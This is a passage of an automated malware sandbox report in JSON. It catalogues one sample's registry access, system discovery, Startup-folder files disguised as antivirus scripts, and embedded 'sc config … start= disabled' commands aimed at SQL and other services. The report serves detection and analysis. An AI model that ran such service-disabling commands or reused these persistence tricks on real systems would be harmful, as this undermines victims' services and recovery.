\"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005796]\n \"Antivirus.bat\" has type \"DOS batch file ASCII text with very long lines (844) with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat]- [targetUID: 00000000-00005796]\n \"YourMom.vbs.bin\" has type \"ASCII text\"- [targetUID: N/A]\n \"Antivirus3.vbs\" has type \"C source ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005796]\n \"KasperskyScanner.hta\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005796]\n \"Antivirus2.vbs\" has type \"ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005796]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67AB4E4F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"YourMomIsGay.html\" has type \"HTML document ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005796]\n \"services\" has type \"ASCII text with no line terminators\"- Location: [%WINDIR%\\System32\\drivers\\etc\\services]- [targetUID: 00000000-00005796]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SHELLCOMPATIBILITY\\OBJECTS\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-172207 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-459482 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-4501943 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-9357313 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-9754688 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-15238206 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-22847603 [PID: 2988]\n \"wmplayer.exe\" queried SystemProcessInformation at 00000000-00002988-00000105-24774207 [PID: 2988]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" queries volume information of \"C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" at 00000000-00005796-0000010C-4912207", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000140098000e0200000000000000000000086d3d0000000000200000000000000000000000804a3f00f8693d00186b3d00e09b3f00c06e3d000000000010f95f00000000006cfb5f0095e1ad776c200700feffffffff2bb1779a2ab17764c54877b69fb177000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c54877e09b3f0064c5487700000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003d000000000074013d0000000000060000000000000050013d001a00000068184100000000001a000000000000001400000000000000000000000000000000000000000000000200000220713f00630400670000000000000000000000008000000000000000f02000d050f140000100000000000000020000000c000000489940004899400043994000000000000000000000003d0000000001e8f329000000000008fa290095e1ad77542e0700feffffff435cb1775059b17794000000a00000004299400040994000940000008cf52900fdfe5d770000000018000000e41df9e8 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"IsWow64Process\" with parameter \"5796\" - (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-194", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate device information", "description": "\"wmplayer.exe\" called \"SetupDiEnumDeviceInfo\" with parameters {\"DeviceInfoSet\": \"39a7c0\"\n \"MemberIndex\": \"0\"\n \"DeviceInfoData\": \"1c000000000000000000000000000000000000000000000000000000\"\n \"$error\": \"103\"}", "origin": "API Call", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d0883f0080fb5f00145cb177435cb1774cfc5f000100000094013d000100000000fb5f00935cb2774083b977d4a0b1777cc7e9774cfc5f00010000000100000058d03f0000000000d0fa5f0000fb5f006cfb5f0095e1ad7784380700feffffffd4a0b1771bbe9f750000437700000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300e85140000f00010e7544000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000b0f440000e851400020713f006f00630061006c005c00500072006f0067007200 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6b17798d59f77f42e1c7258e13f00a0351c72c8d59f770cea2900d8863f00b2f4b177b8d59f771cea290000001572000015720000000078e92900f0000000f00015720000000088e92900530000001ceb29000000000001000000ece9290040f5b1770000000000000000d8e92900 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c47417410bb46008c4741740000000010bb460034e12900086db1771881b97700000000e8e1290000000000de54166574e1290095e1ad77bc2d0700feffffff6b2cb2773119a07502100000000000000000010048e12900c89fb1778c4741740000000000000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: 